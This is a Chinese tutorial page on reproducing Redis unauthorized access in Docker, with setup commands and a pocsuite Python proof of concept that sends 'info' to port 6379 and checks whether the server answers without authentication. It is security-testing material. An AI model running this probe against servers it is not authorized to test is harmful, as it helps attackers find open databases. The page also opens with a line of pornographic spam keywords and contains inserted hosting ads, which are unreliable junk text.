真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

Redis未授權(quán)訪問docker復現(xiàn)-創(chuàng)新互聯(lián)

docker搜索Redis鏡像
docker search redis
拉去鏡像到本地
docker pull redis
查看下載好的鏡像
docker images
運行鏡像
docker run -p 6379:6379 -d redis

-p 將容器的6379端口映射到主機的6379端口。

創(chuàng)新互聯(lián)建站擁有一支富有激情的企業(yè)網(wǎng)站制作團隊,在互聯(lián)網(wǎng)網(wǎng)站建設(shè)行業(yè)深耕十多年,專業(yè)且經(jīng)驗豐富。十多年網(wǎng)站優(yōu)化營銷經(jīng)驗,我們已為數(shù)千家中小企業(yè)提供了做網(wǎng)站、網(wǎng)站建設(shè)解決方案,按需網(wǎng)站制作,設(shè)計滿意,售后服務無憂。所有客戶皆提供一年免費網(wǎng)站維護!

-d 將容器后臺運行。

查看運行中的鏡像
docker ps
POC構(gòu)成
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import socket
from pocsuite.utils import register
from pocsuite.poc import Output, POCBase

class TestPOC(POCBase):
    vulID = '0'
    version = '1'
    author = 'nw01f'
    vulDate = '2018-10-23'
    createDate = '2018-10-23'
    updateDate = '2018-10-23'
    references = ['http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/']
    name = 'Redis Unauthorized'
    appPowerLink = 'https://www.redis.io'
    appName = 'Redis'
    appVersion = 'All'
    vulType = 'Unauthorized'
    desc = '''
            redis Unauthorized
    '''
    samples = ['']

    def _verify(self):
        result = {}
        payload = '\x69\x6e\x66\x6f\x0d\x0a'     ##   info/r/n
        s = socket.socket()
        socket.setdefaulttimeout(4)
        try:
            host = self.url.split(':')[1].strip('/')
            if len(self.url.split(':')) > 2:
                port = int(self.url.split(':')[2].strip('/'))
            else:
                port = 6379
            s.connect((host, port))
            s.send(payload)
            data = s.recv(1024)
            if data and 'redis_version' in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = self.url
                result['VerifyInfo']['port'] = port
                result['VerifyInfo']['result'] = data[:20]
        except Exception as e:
            print e
        s.close()
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("error")
        return output
register(TestPOC)
參考鏈接

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應用場景需求。


文章名稱:Redis未授權(quán)訪問docker復現(xiàn)-創(chuàng)新互聯(lián)
轉(zhuǎn)載來源:http://weahome.cn/article/djgcej.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部